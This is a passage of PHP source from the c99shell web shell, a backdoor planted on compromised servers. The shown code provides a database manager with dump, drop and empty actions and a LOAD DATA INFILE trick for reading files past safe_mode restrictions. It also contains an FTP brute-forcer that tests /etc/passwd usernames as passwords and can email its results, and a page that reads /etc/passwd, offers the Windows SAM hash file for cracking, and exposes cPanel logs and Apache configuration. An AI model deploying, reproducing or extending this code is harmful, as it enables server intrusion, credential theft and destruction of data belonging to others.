  1105. echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=browse\">[&nbsp;<b>Browse</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
  1106. echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_act=tbldump&thistbl=1\">[&nbsp;<b>Dump</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
  1107. echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=insert\">[&nbsp;<b>Insert</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
  1108. if ($sql_tbl_act == "structure") {echo "<br><br><b>Coming sooon!</b>";}
  1109. if ($sql_tbl_act == "insert")
  1110. {
  1111. if (!is_array($sql_tbl_insert)) {$sql_tbl_insert = array();}
  1112. if (!empty($sql_tbl_insert_radio))
  1113. {
  1114.  
  1115. }
  1116. else
  1117. {
  1118. echo "<br><br><b>Inserting row into table:</b><br>";
  1119. if (!empty($sql_tbl_insert_q))
  1120. {
  1121. $sql_query = "SELECT * FROM `".$sql_tbl."`";
  1122. $sql_query .= " WHERE".$sql_tbl_insert_q;
  1123. $sql_query .= " LIMIT 1;";
  1124. $result = mysql_query($sql_query,$sql_sock) or print("<br><br>".mysql_smarterror());
  1125. $values = mysql_fetch_assoc($result);
  1126. mysql_free_result($result);
  1127. }
  1128. else {$values = array();}
  1129. echo "<form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"1%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td><b>Field</b></td><td><b>Type</b></td><td><b>Function</b></td><td><b>Value</b></td></tr>";
  1130. foreach ($tbl_struct_fields as $field)
  1131. {
  1132. $name = $field["Field"];
  1133. if (empty($sql_tbl_insert_q)) {$v = "";}
  1134. echo "<tr><td><b>".htmlspecialchars($name)."</b></td><td>".$field["Type"]."</td><td><select name=\"sql_tbl_insert_functs[".htmlspecialchars($name)."]\"><option value=\"\"></option><option>PASSWORD</option><option>MD5</option><option>ENCRYPT</option><option>ASCII</option><option>CHAR</option><option>RAND</option><option>LAST_INSERT_ID</option><option>COUNT</option><option>AVG</option><option>SUM</option><option value=\"\">--------</option><option>SOUNDEX</option><option>LCASE</option><option>UCASE</option><option>NOW</option><option>CURDATE</option><option>CURTIME</option><option>FROM_DAYS</option><option>FROM_UNIXTIME</option><option>PERIOD_ADD</option><option>PERIOD_DIFF</option><option>TO_DAYS</option><option>UNIX_TIMESTAMP</option><option>USER</option><option>WEEKDAY</option><option>CONCAT</option></select></td><td><input type=\"text\" name=\"sql_tbl_insert[".htmlspecialchars($name)."]\" value=\"".htmlspecialchars($values[$name])."\" size=50></td></tr>";
  1135. $i++;
  1136. }
  1137. echo "</table><br>";
  1138. echo "<input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"1\""; if (empty($sql_tbl_insert_q)) {echo " checked";} echo "><b>Insert as new row</b>";
  1139. if (!empty($sql_tbl_insert_q)) {echo " or <input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"2\" checked><b>Save</b>"; echo "<input type=\"hidden\" name=\"sql_tbl_insert_q\" value=\"".htmlspecialchars($sql_tbl_insert_q)."\">";}
  1140. echo "<br><br><input type=\"submit\" value=\"Confirm\"></form>";
  1141. }
  1142. }
  1143. if ($sql_tbl_act == "browse")
  1144. {
  1145. $sql_tbl_ls = abs($sql_tbl_ls);
  1146. $sql_tbl_le = abs($sql_tbl_le);
  1147. echo "<hr size=\"1\" noshade>";
  1148. echo "<img src=\"".$surl."act=img&img=multipage\" height=\"12\" width=\"10\" alt=\"Pages\">&nbsp;";
  1149. $b = 0;
  1150. for($i=0;$i<$numpages;$i++)
  1151. {
  1152. if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_order=".htmlspecialchars($sql_order)."&sql_tbl_ls=".($i*$perpage)."&sql_tbl_le=".($i*$perpage+$perpage)."\"><u>";}
  1153. echo $i;
  1154. if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "</u></a>";}
  1155. if (($i/30 == round($i/30)) and ($i > 0)) {echo "<br>";}
  1156. else {echo "&nbsp;";}
  1157. }
  1158. if ($i == 0) {echo "empty";}
  1159. echo "<form method=\"GET\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"sql_order\" value=\"".htmlspecialchars($sql_order)."\"><b>From:</b>&nbsp;<input type=\"text\" name=\"sql_tbl_ls\" value=\"".$sql_tbl_ls."\">&nbsp;<b>To:</b>&nbsp;<input type=\"text\" name=\"sql_tbl_le\" value=\"".$sql_tbl_le."\">&nbsp;<input type=\"submit\" value=\"View\"></form>";
  1160. echo "<br><form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"1%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1>";
  1161. echo "<tr>";
  1162. echo "<td><input type=\"checkbox\" name=\"boxrow_all\" value=\"1\"></td>";
  1163. for ($i=0;$i<mysql_num_fields($result);$i++)
  1164. {
  1165. $v = mysql_field_name($result,$i);
  1166. if ($e[0] == "a") {$s = "d"; $m = "asc";}
  1167. else {$s = "a"; $m = "desc";}
  1168. echo "<td>";
  1169. if (empty($e[0])) {$e[0] = "a";}
  1170. if ($e[1] != $v) {echo "<a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$e[0]."%20".$v."\"><b>".$v."</b></a>";}
  1171. else {echo "<b>".$v."</b><a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$s."%20".$v."\"><img src=\"".$surl."act=img&img=sort_".$m."\" height=\"9\" width=\"14\" alt=\"".$m."\"></a>";}
  1172. echo "</td>";
  1173. }
  1174. echo "<td><font color=\"green\"><b>Action</b></font></td>";
  1175. echo "</tr>";
  1176. while ($row = mysql_fetch_array($result, MYSQL_ASSOC))
  1177. {
  1178. echo "<tr>";
  1179. $w = "";
  1180. $i = 0;
  1181. foreach ($row as $k=>$v) {$name = mysql_field_name($result,$i); $w .= " `".$name."` = '".addslashes($v)."' AND"; $i++;}
  1182. if (count($row) > 0) {$w = substr($w,0,strlen($w)-3);}
  1183. echo "<td><input type=\"checkbox\" name=\"boxrow[]\" value=\"".$w."\"></td>";
  1184. $i = 0;
  1185. foreach ($row as $k=>$v)
  1186. {
  1187. $v = htmlspecialchars($v);
  1188. if ($v == "") {$v = "<font color=\"green\">NULL</font>";}
  1189. echo "<td>".$v."</td>";
  1190. $i++;
  1191. }
  1192. echo "<td>";
  1193. echo "<a href=\"".$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_query=".urlencode("DELETE FROM `".$sql_tbl."` WHERE".$w." LIMIT 1;")."\"><img src=\"".$surl."act=img&img=sql_button_drop\" alt=\"Delete\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;";
  1194. echo "<a href=\"".$sql_surl."sql_tbl_act=insert&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_insert_q=".urlencode($w)."\"><img src=\"".$surl."act=img&img=change\" alt=\"Edit\" height=\"14\" width=\"14\" border=\"0\"></a>&nbsp;";
  1195. echo "</td>";
  1196. echo "</tr>";
  1197. }
  1198. mysql_free_result($result);
  1199. echo "</table><hr size=\"1\" noshade><p align=\"left\"><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\"><select name=\"sql_act\">";
  1200. echo "<option value=\"\">With selected:</option>";
  1201. echo "<option value=\"deleterow\">Delete</option>";
  1202. echo "</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></form></p>";
  1203. }
  1204. }
  1205. else
  1206. {
  1207. $result = mysql_query("SHOW TABLE STATUS", $sql_sock);
  1208. if (!$result) {echo mysql_smarterror();}
  1209. else
  1210. {
  1211. echo "<br><form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td><input type=\"checkbox\" name=\"boxtbl_all\" value=\"1\"></td><td><center><b>Table</b></center></td><td><b>Rows</b></td><td><b>Type</b></td><td><b>Created</b></td><td><b>Modified</b></td><td><b>Size</b></td><td><b>Action</b></td></tr>";
  1212. $i = 0;
  1213. $tsize = $trows = 0;
  1214. while ($row = mysql_fetch_array($result, MYSQL_ASSOC))
  1215. {
  1216. $tsize += $row["Data_length"];
  1217. $trows += $row["Rows"];
  1218. $size = view_size($row["Data_length"]);
  1219. echo "<tr>";
  1220. echo "<td><input type=\"checkbox\" name=\"boxtbl[]\" value=\"".$row["Name"]."\"></td>";
  1221. echo "<td>&nbsp;<a href=\"".$sql_surl."sql_tbl=".urlencode($row["Name"])."\"><b>".$row["Name"]."</b></a>&nbsp;</td>";
  1222. echo "<td>".$row["Rows"]."</td>";
  1223. echo "<td>".$row["Type"]."</td>";
  1224. echo "<td>".$row["Create_time"]."</td>";
  1225. echo "<td>".$row["Update_time"]."</td>";
  1226. echo "<td>".$size."</td>";
  1227. echo "<td>&nbsp;<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DELETE FROM `".$row["Name"]."`")."\"><img src=\"".$surl."act=img&img=sql_button_empty\" alt=\"Empty\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;&nbsp;<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DROP TABLE `".$row["Name"]."`")."\"><img src=\"".$surl."act=img&img=sql_button_drop\" alt=\"Drop\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;<a href=\"".$sql_surl."sql_tbl_act=insert&sql_tbl=".$row["Name"]."\"><img src=\"".$surl."act=img&img=sql_button_insert\" alt=\"Insert\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;</td>";
  1228. echo "</tr>";
  1229. $i++;
  1230. }
  1231. echo "<tr bgcolor=\"000000\">";
  1232. echo "<td><center><b>»</b></center></td>";
  1233. echo "<td><center><b>".$i." table(s)</b></center></td>";
  1234. echo "<td><b>".$trows."</b></td>";
  1235. echo "<td>".$row[1]."</td>";
  1236. echo "<td>".$row[10]."</td>";
  1237. echo "<td>".$row[11]."</td>";
  1238. echo "<td><b>".view_size($tsize)."</b></td>";
  1239. echo "<td></td>";
  1240. echo "</tr>";
  1241. echo "</table><hr size=\"1\" noshade><p align=\"right\"><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\"><select name=\"sql_act\">";
  1242. echo "<option value=\"\">With selected:</option>";
  1243. echo "<option value=\"tbldrop\">Drop</option>";
  1244. echo "<option value=\"tblempty\">Empty</option>";
  1245. echo "<option value=\"tbldump\">Dump</option>";
  1246. echo "<option value=\"tblcheck\">Check table</option>";
  1247. echo "<option value=\"tbloptimize\">Optimize table</option>";
  1248. echo "<option value=\"tblrepair\">Repair table</option>";
  1249. echo "<option value=\"tblanalyze\">Analyze table</option>";
  1250. echo "</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></form></p>";
  1251. mysql_free_result($result);
  1252. }
  1253. }
  1254. }
  1255. }
  1256. }
  1257. else
  1258. {
  1259. $acts = array("","newdb","serverstatus","servervars","processes","getfile");
  1260. if (in_array($sql_act,$acts)) {?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new DB:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newdb"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newdb" size="20">&nbsp;<input type="submit" value="Create"></form></td><td width="30%" height="1"><b>View File:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="getfile"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_getfile" size="30" value="<?php echo htmlspecialchars($sql_getfile); ?>">&nbsp;<input type="submit" value="Get"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php }
  1261. if (!empty($sql_act))
  1262. {
  1263. echo "<hr size=\"1\" noshade>";
  1264. if ($sql_act == "newdb")
  1265. {
  1266. echo "<b>";
  1267. if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";}
  1268. else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();}
  1269. }
  1270. if ($sql_act == "serverstatus")
  1271. {
  1272. $result = mysql_query("SHOW STATUS", $sql_sock);
  1273. echo "<center><b>Server-status variables:</b><br><br>";
  1274. echo "<TABLE cellSpacing=0 cellPadding=0 bgColor=#333333 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>Value</b></td></tr>";
  1275. while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";}
  1276. echo "</table></center>";
  1277. mysql_free_result($result);
  1278. }
  1279. if ($sql_act == "servervars")
  1280. {
  1281. $result = mysql_query("SHOW VARIABLES", $sql_sock);
  1282. echo "<center><b>Server variables:</b><br><br>";
  1283. echo "<TABLE cellSpacing=0 cellPadding=0 bgColor=#333333 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>Value</b></td></tr>";
  1284. while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";}
  1285. echo "</table>";
  1286. mysql_free_result($result);
  1287. }
  1288. if ($sql_act == "processes")
  1289. {
  1290. if (!empty($kill)) {$query = "KILL ".$kill.";"; $result = mysql_query($query, $sql_sock); echo "<b>Killing process #".$kill."... ok. he is dead, amen.</b>";}
  1291. $result = mysql_query("SHOW PROCESSLIST", $sql_sock);
  1292. echo "<center><b>Processes:</b><br><br>";
  1293. echo "<TABLE cellSpacing=0 cellPadding=2 bgColor=#333333 borderColorLight=#333333 border=1><td><b>ID</b></td><td><b>USER</b></td><td><b>HOST</b></td><td><b>DB</b></td><td><b>COMMAND</b></td><td><b>TIME</b></td><td><b>STATE</b></td><td><b>INFO</b></td><td><b>Action</b></td></tr>";
  1294. while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td><td>".$row[2]."</td><td>".$row[3]."</td><td>".$row[4]."</td><td>".$row[5]."</td><td>".$row[6]."</td><td>".$row[7]."</td><td><a href=\"".$sql_surl."sql_act=processes&kill=".$row[0]."\"><u>Kill</u></a></td></tr>";}
  1295. echo "</table>";
  1296. mysql_free_result($result);
  1297. }
  1298. if ($sql_act == "getfile")
  1299. {
  1300. $tmpdb = $sql_login."_tmpdb";
  1301. $select = mysql_select_db($tmpdb);
  1302. if (!$select) {mysql_create_db($tmpdb); $select = mysql_select_db($tmpdb); $created = !!$select;}
  1303. if ($select)
  1304. {
  1305. $created = false;
  1306. mysql_query("CREATE TABLE `tmp_file` ( `Viewing the file in safe_mode+open_basedir` LONGBLOB NOT NULL );");
  1307. mysql_query("LOAD DATA INFILE \"".addslashes($sql_getfile)."\" INTO TABLE tmp_file");
  1308. $result = mysql_query("SELECT * FROM tmp_file;");
  1309. if (!$result) {echo "<b>Error in reading file (permision denied)!</b>";}
  1310. else
  1311. {
  1312. for ($i=0;$i<mysql_num_fields($result);$i++) {$name = mysql_field_name($result,$i);}
  1313. $f = "";
  1314. while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) {$f .= join ("\r\n",$row);}
  1315. if (empty($f)) {echo "<b>File \"".$sql_getfile."\" does not exists or empty!</b><br>";}
  1316. else {echo "<b>File \"".$sql_getfile."\":</b><br>".nl2br(htmlspecialchars($f))."<br>";}
  1317. mysql_free_result($result);
  1318. mysql_query("DROP TABLE tmp_file;");
  1319. }
  1320. }
  1321. mysql_drop_db($tmpdb); //comment it if you want to leave database
  1322. }
  1323. }
  1324. }
  1325. }
  1326. echo "</td></tr></table>";
  1327. if ($sql_sock)
  1328. {
  1329. $affected = @mysql_affected_rows($sql_sock);
  1330. if ((!is_numeric($affected)) or ($affected < 0)){$affected = 0;}
  1331. echo "<tr><td><center><b>Affected rows: ".$affected."</center></td></tr>";
  1332. }
  1333. echo "</table>";
  1334. }
  1335. if ($act == "mkdir")
  1336. {
  1337. if ($mkdir != $d)
  1338. {
  1339. if (file_exists($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: object alredy exists";}
  1340. elseif (!mkdir($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: access denied";}
  1341. echo "<br><br>";
  1342. }
  1343. $act = $dspact = "ls";
  1344. }
  1345. if ($act == "ftpquickbrute")
  1346. {
  1347. echo "<b>Ftp Quick brute:</b><br>";
  1348. if (!win) {echo "This functions not work in Windows!<br><br>";}
  1349. else
  1350. {
  1351. function c99ftpbrutecheck($host,$port,$timeout,$login,$pass,$sh,$fqb_onlywithsh)
  1352. {
  1353. if ($fqb_onlywithsh) {$true = (!in_array($sh,array("/bin/false","/sbin/nologin")));}
  1354. else {$true = true;}
  1355. if ($true)
  1356. {
  1357. $sock = @ftp_connect($host,$port,$timeout);
  1358. if (@ftp_login($sock,$login,$pass))
  1359. {
  1360. echo "<a href=\"ftp://".$login.":".$pass."@".$host."\" target=\"_blank\"><b>Connected to ".$host." with login \"".$login."\" and password \"".$pass."\"</b></a>.<br>";
  1361. ob_flush();
  1362. return true;
  1363. }
  1364. }
  1365. }
  1366. if (!empty($submit))
  1367. {
  1368. if (!is_numeric($fqb_lenght)) {$fqb_lenght = $nixpwdperpage;}
  1369. $fp = fopen("/etc/passwd","r");
  1370. if (!$fp) {echo "Can't get /etc/passwd for password-list.";}
  1371. else
  1372. {
  1373. if ($fqb_logging)
  1374. {
  1375. if ($fqb_logfile) {$fqb_logfp = fopen($fqb_logfile,"w");}
  1376. else {$fqb_logfp = false;}
  1377. $fqb_log = "FTP Quick Brute (called c99shell v. ".$shver.") started at ".date("d.m.Y H:i:s")."\r\n\r\n";
  1378. if ($fqb_logfile) {fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}
  1379. }
  1380. ob_flush();
  1381. $i = $success = 0;
  1382. $ftpquick_st = getmicrotime();
  1383. while(!feof($fp))
  1384. {
  1385. $str = explode(":",fgets($fp,2048));
  1386. if (c99ftpbrutecheck("localhost",21,1,$str[0],$str[0],$str[6],$fqb_onlywithsh))
  1387. {
  1388. echo "<b>Connected to ".$SERVER_NAME." with login \"".$str[0]."\" and password \"".$str[0]."\"</b><br>";
  1389. $fqb_log .= "Connected to ".$SERVER_NAME." with login \"".$str[0]."\" and password \"".$str[0]."\", at ".date("d.m.Y H:i:s")."\r\n";
  1390. if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}
  1391. $success++;
  1392. ob_flush();
  1393. }
  1394. if ($i > $fqb_lenght) {break;}
  1395. $i++;
  1396. }
  1397. if ($success == 0) {echo "No success. connections!"; $fqb_log .= "No success. connections!\r\n";}
  1398. $ftpquick_t = round(getmicrotime()-$ftpquick_st,4);
  1399. echo "<hr size=\"1\" noshade><b>Done!</b><br>Total time (secs.): ".$ftpquick_t."<br>Total connections: ".$i."<br>Success.: <font color=\"green\"><b>".$success."</b></font><br>Unsuccess.:".($i-$success)."</b><br>Connects per second: ".round($i/$ftpquick_t,2)."<br>";
  1400. $fqb_log .= "\r\n------------------------------------------\r\nDone!\r\nTotal time (secs.): ".$ftpquick_t."\r\nTotal connections: ".$i."\r\nSuccess.: ".$success."\r\nUnsuccess.:".($i-$success)."\r\nConnects per second: ".round($i/$ftpquick_t,2)."\r\n";
  1401. if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}
  1402. if ($fqb_logemail) {@mail($fqb_logemail,"c99shell v. ".$shver." report",$fqb_log);}
  1403. fclose($fqb_logfp);
  1404. }
  1405. }
  1406. else
  1407. {
  1408. $logfile = $tmpdir_logs."c99sh_ftpquickbrute_".date("d.m.Y_H_i_s").".log";
  1409. $logfile = str_replace("//",DIRECTORY_SEPARATOR,$logfile);
  1410. echo "<form method=\"POST\"><br>Read first: <input type=\"text\" name=\"fqb_lenght\" value=\"".$nixpwdperpage."\"><br><br>Users only with shell?&nbsp;<input type=\"checkbox\" name=\"fqb_onlywithsh\" value=\"1\"><br><br>Logging?&nbsp;<input type=\"checkbox\" name=\"fqb_logging\" value=\"1\" checked><br>Logging to file?&nbsp;<input type=\"text\" name=\"fqb_logfile\" value=\"".$logfile."\" size=\"".(strlen($logfile)+2*(strlen($logfile)/10))."\"><br>Logging to e-mail?&nbsp;<input type=\"text\" name=\"fqb_logemail\" value=\"".$log_email."\" size=\"".(strlen($logemail)+2*(strlen($logemail)/10))."\"><br><br><input type=\"submit\" name=\"submit\" value=\"Brute\"></form>";
  1411. }
  1412. }
  1413. }
  1414. if ($act == "d")
  1415. {
  1416. if (!is_dir($d)) {echo "<center><b>Permision denied!</b></center>";}
  1417. else
  1418. {
  1419. echo "<b>Directory information:</b><table border=0 cellspacing=1 cellpadding=2>";
  1420. if (!$win)
  1421. {
  1422. echo "<tr><td><b>Owner/Group</b></td><td> ";
  1423. $tmp = posix_getpwuid(fileowner($d));
  1424. if ($tmp["name"] == "") {echo fileowner($d)."/";}
  1425. else {echo $tmp["name"]."/";}
  1426. $tmp = posix_getgrgid(filegroup($d));
  1427. if ($tmp["name"] == "") {echo filegroup($d);}
  1428. else {echo $tmp["name"];}
  1429. }
  1430. echo "<tr><td><b>Perms</b></td><td><a href=\"".$surl."act=chmod&d=".urlencode($d)."\"><b>".view_perms_color($d)."</b></a><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d))."</td></tr></table><br>";
  1431. }
  1432. }
  1433. if ($act == "phpinfo") {@ob_clean(); phpinfo(); exit;}
  1434. if ($act == "security")
  1435. {
  1436. echo "<center><b>Server security information:</b></center><b>Software:</b> ".PHP_OS.", ".$SERVER_SOFTWARE."<br><b>Safe-Mode: ".$hsafemode."</b><br><b>Open base dir: ".$hopenbasedir."</b><br>";
  1437. if (!$win)
  1438. {
  1439. if ($nixpasswd)
  1440. {
  1441. if ($nixpasswd == 1) {$nixpasswd = 0;}
  1442. echo "<b>*nix /etc/passwd:</b><br>";
  1443. if (!is_numeric($nixpwd_s)) {$nixpwd_s = 0;}
  1444. if (!is_numeric($nixpwd_e)) {$nixpwd_e = $nixpwdperpage;}
  1445. echo "<form method=\"GET\"><input type=\"hidden\" name=\"act\" value=\"security\"><input type=\"hidden\" name=\"nixpasswd\" value=\"1\"><b>From:</b>&nbsp;<input type=\"text=\" name=\"nixpwd_s\" value=\"".$nixpwd_s."\">&nbsp;<b>To:</b>&nbsp;<input type=\"text\" name=\"nixpwd_e\" value=\"".$nixpwd_e."\">&nbsp;<input type=\"submit\" value=\"View\"></form><br>";
  1446. $i = $nixpwd_s;
  1447. while ($i < $nixpwd_e)
  1448. {
  1449. $uid = posix_getpwuid($i);
  1450. if ($uid)
  1451. {
  1452. $uid["dir"] = "<a href=\"".$surl."act=ls&d=".urlencode($uid["dir"])."\">".$uid["dir"]."</a>";
  1453. echo join(":",$uid)."<br>";
  1454. }
  1455. $i++;
  1456. }
  1457. }
  1458. else {echo "<br><a href=\"".$surl."act=security&nixpasswd=1&d=".$ud."\"><b><u>Get /etc/passwd</u></b></a><br>";}
  1459. }
  1460. else
  1461. {
  1462. $v = $_SERVER["WINDIR"]."\repair\sam";
  1463. if (file_get_contents($v)) {echo "<b><font color=\"red\">You can't crack winnt passwords(".$v.") </font></b><br>";}
  1464. else {echo "<b><font color=\"green\">You can crack winnt passwords. <a href=\"".$surl."act=f&f=sam&d=".$_SERVER["WINDIR"]."\\repair&ft=download\"><u><b>Download</b></u></a>, and use lcp.crack+ ©.</font></b><br>";}
  1465. }
  1466. if (file_get_contents("/etc/userdomains")) {echo "<b><font color=\"green\"><a href=\"".$surl."act=f&f=userdomains&d=/etc/&ft=txt\"><u><b>View cpanel user-domains logs</b></u></a></font></b><br>";}
  1467. if (file_get_contents("/var/cpanel/accounting.log")) {echo "<b><font color=\"green\"><a href=\"".$surl."act=f&f=accounting.log&d=/var/cpanel/&ft=txt\"><u><b>View cpanel logs</b></u></a></font></b><br>";}
  1468. if (file_get_contents("/usr/local/apache/conf/httpd.conf")) {echo "<b><font color=\"green\"><a href=\"".$surl."act=f&f=httpd.conf&d=/usr/local/apache/conf/&ft=txt\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";}
  1469. if (file_get_contents("/etc/httpd.conf")) {echo "<b><font color=\"green\"><a href=\"".$surl."act=f&f=httpd.conf&d=/etc/&ft=txt\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";}
  1470. }
  1471. if ($act == "mkfile")
  1472. {
  1473. if ($mkfile != $d)
  1474. {
  1475. if (file_exists($mkfile)) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: object alredy exists";}
  1476. elseif (!fopen($mkfile,"w")) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: access denied";}
  1477. else {$act = "f"; $d = dirname($mkfile); if (substr($d,-1,1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} $f = basename($mkfile);}
  1478. }
  1479. else {$act = $dspact = "ls";}
  1480. }
  1481. if ($act == "encoder")
  1482. {
  1483. echo "<script>function set_encoder_input(text) {document.forms.encoder.input.value = text;}</script><center><b>Encoder:</b></center><form name=\"encoder\" method=\"POST\"><b>Input:</b><center><textarea name=\"encoder_input\" id=\"input\" cols=50 rows=5>".@htmlspecialchars($encoder_input)."</textarea><br><br><input type=submit value=\"calculate\"><br><br></center><b>Hashes</b>:<br><center>";
  1484. foreach(array("md5","crypt","sha1","crc32") as $v)
  1485. {
  1486. echo $v." - <input type=text size=50 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".$v($encoder_input)."\" readonly><br>";
  1487. }
  1488. echo "</center><b>Url:</b><center><br>urlencode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".urlencode($encoder_input)."\" readonly>
  1489. <br>urldecode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".urldecode($encoder_input)."\" readonly>
  1490. <br></center><b>Base64:</b><center>base64_encode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".base64_encode($encoder_input)."\" readonly></center>";
  1491. echo "<center>base64_decode - ";
  1492. if (base64_encode(base64_decode($encoder_input)) != $encoder_input) {echo "<input type=text size=35 value=\"failed\" disabled readonly>";}
  1493. else
  1494. {
  1495. $debase64 = base64_decode($encoder_input);
  1496. $debase64 = str_replace("\0","[0]",$debase64);
  1497. $a = explode("\r\n",$debase64);
  1498. $rows = count($a);
  1499. $debase64 = htmlspecialchars($debase64);
  1500. if ($rows == 1) {echo "<input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".$debase64."\" id=\"debase64\" readonly>";}
  1501. else {$rows++; echo "<textarea cols=\"40\" rows=\"".$rows."\" onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" id=\"debase64\" readonly>".$debase64."</textarea>";}
  1502. echo "&nbsp;<a href=\"#\" onclick=\"set_encoder_input(document.forms.encoder.debase64.value)\"><b>^</b></a>";
  1503. }
  1504. echo "</center><br><b>Base convertations</b>:<center>dec2hex - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"";
  1505. $c = strlen($encoder_input);
  1506. for($i=0;$i<$c;$i++)
  1507. {
  1508. $hex = dechex(ord($encoder_input[$i]));
  1509. if ($encoder_input[$i] == "&") {echo $encoder_input[$i];}
  1510. elseif ($encoder_input[$i] != "\\") {echo "%".$hex;}
  1511. }
